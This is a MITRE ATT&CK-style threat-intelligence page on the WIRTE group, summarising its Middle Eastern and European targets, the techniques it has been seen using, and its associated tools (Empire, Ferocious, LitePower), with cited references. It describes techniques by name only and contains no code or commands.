G0090 WIRTE

WIRTE is a threat group that has been active since at least August 2018. WIRTE has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.¹²

Item	Value
ID	G0090
Associated Names
Version	2.0
Created	24 May 2019
Last Modified	15 April 2022
Navigation Layer	View In ATT&CK® Navigator

Techniques Used

Domain	ID	Name	Use
enterprise	T1071	Application Layer Protocol	-
enterprise	T1071.001	Web Protocols	WIRTE has used HTTP for network communication.¹
enterprise	T1059	Command and Scripting Interpreter	-
enterprise	T1059.001	PowerShell	WIRTE has used PowerShell for script execution.¹
enterprise	T1059.005	Visual Basic	WIRTE has used VBScript in its operations.¹
enterprise	T1140	Deobfuscate/Decode Files or Information	WIRTE has used Base64 to decode malicious VBS script.¹
enterprise	T1105	Ingress Tool Transfer	WIRTE has downloaded PowerShell code from the C2 server to be executed.¹
enterprise	T1036	Masquerading	-
enterprise	T1036.005	Match Legitimate Name or Location	WIRTE has named a first stage dropper `Kaspersky Update Agent` in order to appear legitimate.²
enterprise	T1571	Non-Standard Port	WIRTE has used HTTPS over ports 2083 and 2087 for C2.²
enterprise	T1588	Obtain Capabilities	-
enterprise	T1588.002	Tool	WIRTE has obtained and used Empire for post-exploitation activities.¹
enterprise	T1566	Phishing	-
enterprise	T1566.001	Spearphishing Attachment	WIRTE has sent emails to intended victims with malicious MS Word and Excel attachments.²
enterprise	T1218	System Binary Proxy Execution	-
enterprise	T1218.010	Regsvr32	WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script.¹
enterprise	T1204	User Execution	-
enterprise	T1204.002	Malicious File	WIRTE has attempted to lure users into opening malicious MS Word and Excel files to execute malicious payloads.²

Software

ID	Name	References	Techniques
S0363	Empire	¹	Bypass User Account Control:Abuse Elevation Control Mechanism Access Token Manipulation SID-History Injection:Access Token Manipulation Create Process with Token:Access Token Manipulation Domain Account:Account Discovery Local Account:Account Discovery LLMNR/NBT-NS Poisoning and SMB Relay:Adversary-in-the-Middle Web Protocols:Application Layer Protocol Archive Collected Data Automated Collection Automated Exfiltration Shortcut Modification:Boot or Logon Autostart Execution Registry Run Keys / Startup Folder:Boot or Logon Autostart Execution Security Support Provider:Boot or Logon Autostart Execution Browser Information Discovery Clipboard Data PowerShell:Command and Scripting Interpreter Windows Command Shell:Command and Scripting Interpreter Command and Scripting Interpreter Domain Account:Create Account Local Account:Create Account Windows Service:Create or Modify System Process Credentials from Web Browsers:Credentials from Password Stores Group Policy Modification:Domain Policy Modification Domain Trust Discovery Local Email Collection:Email Collection Asymmetric Cryptography:Encrypted Channel Accessibility Features:Event Triggered Execution Exfiltration Over C2 Channel Exfiltration to Code Repository:Exfiltration Over Web Service Exfiltration to Cloud Storage:Exfiltration Over Web Service Exploitation for Privilege Escalation Exploitation of Remote Services File and Directory Discovery Group Policy Discovery Path Interception by Search Order Hijacking:Hijack Execution Flow Dylib Hijacking:Hijack Execution Flow Path Interception by Unquoted Path:Hijack Execution Flow DLL Search Order Hijacking:Hijack Execution Flow Path Interception by PATH Environment Variable:Hijack Execution Flow Timestomp:Indicator Removal Ingress Tool Transfer Keylogging:Input Capture Credential API Hooking:Input Capture Native API Network Service Discovery Network Share Discovery Network Sniffing Command Obfuscation:Obfuscated Files or Information LSASS Memory:OS Credential Dumping Process Discovery Process Injection Distributed Component Object Model:Remote Services SSH:Remote Services Scheduled Task:Scheduled Task/Job Screen Capture Security Software Discovery:Software Discovery Kerberoasting:Steal or Forge Kerberos Tickets Silver Ticket:Steal or Forge Kerberos Tickets Golden Ticket:Steal or Forge Kerberos Tickets System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery Service Execution:System Services MSBuild:Trusted Developer Utilities Proxy Execution Credentials In Files:Unsecured Credentials Private Keys:Unsecured Credentials Pass the Hash:Use Alternate Authentication Material Video Capture Bidirectional Communication:Web Service Windows Management Instrumentation
S0679	Ferocious	²	Visual Basic:Command and Scripting Interpreter PowerShell:Command and Scripting Interpreter Component Object Model Hijacking:Event Triggered Execution File Deletion:Indicator Removal Modify Registry Peripheral Device Discovery Security Software Discovery:Software Discovery System Information Discovery System Checks:Virtualization/Sandbox Evasion
S0680	LitePower	²	Web Protocols:Application Layer Protocol PowerShell:Command and Scripting Interpreter Exfiltration Over C2 Channel Ingress Tool Transfer Native API Query Registry Scheduled Task:Scheduled Task/Job Screen Capture Security Software Discovery:Software Discovery System Information Discovery System Owner/User Discovery

References

S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019. ↩↩↩↩↩↩↩↩↩
Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022. ↩↩↩↩↩↩↩